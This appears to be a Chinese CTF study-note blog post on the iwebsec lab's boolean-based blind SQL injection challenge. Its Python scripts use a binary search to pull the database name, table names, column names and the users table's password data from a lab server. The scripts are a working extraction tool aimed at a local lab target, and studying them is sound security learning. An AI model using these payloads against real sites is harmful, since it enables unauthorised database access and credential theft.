CTF学习笔记5:iwebsec-SQL注入漏洞-03-bool注入

一、解题过程

(一)观察payload与结果

1.SQL执行有结果,就输出welcome to iwebsec!!!

在这里插入图片描述

2.否则输出1

在这里插入图片描述

(二)编写脚本逐项获取信息

1.获取数据库名字符串长度

先要为python安装requests包

pip install requests

python代码如下:

#encoding=utf-8
import requests
import os

url="http://192.168.182.130:8001/sqli/03.php"

def DbLen():
	for i in range(1,20):
		payload="?id=1 and (length(database())={})--+".format(i)
		req_url=url+payload
		rep=requests.get(url=req_url)
		if "welcome to iwebsec!!!" in rep.text:
			print("DB length is "+str(i))
DbLen()

在这里插入图片描述

2.获取数据库名

def DbName():
	result=""
	for i in range(1,8):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload="?id=1 and ord(mid((select database()),{},1))>{} --+".format(i,mid)
			req_url=url+payload
			#print(req_url)
			rep=requests.get(url=req_url)
			if "welcome to iwebsec!!!" in rep.text:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
DbName()

在这里插入图片描述

3.获取表名

def TablesName():
	result=""
	for i in range(1,50):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload='''?id=1 and ord(mid((select group_concat(table_name) 
			from information_schema.tables where table_schema=database()),{},1))>{} --+'''.format(i,mid)
			req_url=url+payload
			#print(req_url)
			rep=requests.get(url=req_url)
			if "welcome to iwebsec!!!" in rep.text:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
TablesName()

在这里插入图片描述

4.获取users表的列名

def ColumnsName():
	result=""
	for i in range(1,30):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload='''?id=1 and ord(mid((select group_concat(column_name) 
				from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{} --+'''.format(i,mid)			
			req_url=url+payload
			#print(req_url)
			rep=requests.get(url=req_url)
			if "welcome to iwebsec!!!" in rep.text:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
ColumnsName()

在这里插入图片描述

5.获取password字段的数据

def GetData():
	result=""
	for i in range(1,20):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload="?id=1 and ord(mid((select group_concat(password) from iwebsec.users),{},1))>{} --+".format(i,mid)			
			req_url=url+payload
			#print(req_url)
			rep=requests.get(url=req_url)
			if "welcome to iwebsec!!!" in rep.text:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
GetData()

在这里插入图片描述

二、源码分析

(一)php源码分析

在这里插入图片描述

(二)部分脚本分析

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值